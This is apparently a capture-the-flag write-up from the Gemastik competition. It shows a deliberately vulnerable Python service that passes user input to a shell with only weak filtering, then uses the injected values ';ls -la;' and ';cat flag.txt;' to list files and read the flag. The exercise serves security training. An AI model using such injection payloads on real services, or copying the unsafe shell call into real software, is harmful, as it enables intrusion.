Random String Generator - 75 Points

nc target.netsec.gemastik.ui.ac.id 60002

POC

#/usr/bin/env python

"""
  Run on Linux
  socat -d -d -d TCP4-LISTEN:60004,reuseaddr,fork EXEC:"/usr/bin/python random-string-generator.py" > /dev/null 2>&1 &
"""

import subprocess
import sys


print "== Gemastik Random String Generator =="
length = raw_input('Insert Length: ')

if  '|' not in length and '&' not in length:
    cmd = "head /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w '%s' | head -n 1" %  length
    ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    output = ps.communicate()[0]
    print output

Walaupun input kita di validasi tapi namun belum begitu ketat sehingga kita dapat mengeksekusi kode yg kita input

== Gemastik Random String Generator ==
Insert Length:  ';ls -la;'
fold: invalid number of columns: ''
total 16
dr-xr-xr-x 2 root root 4096 Oct  7 00:45 .
drwxr-xr-x 3 root root 4096 Oct  6 23:15 ..
-r--r--r-- 3 root root   42 Oct  6 18:01 flag.txt
-r--r--r-- 1 root root  585 Oct  7 00:45 random-string-generator.py
/bin/sh: 1: : Permission denied

== Gemastik Random String Generator ==
Insert Length:  ';cat flag.txt;'
fold: invalid number of columns: ''
GEMASTIK{shelly_shell_sh3ll_execuzzionnn}
/bin/sh: 1: : Permission denied

Flag: GEMASTIK{shelly_shell_sh3ll_execuzzionnn}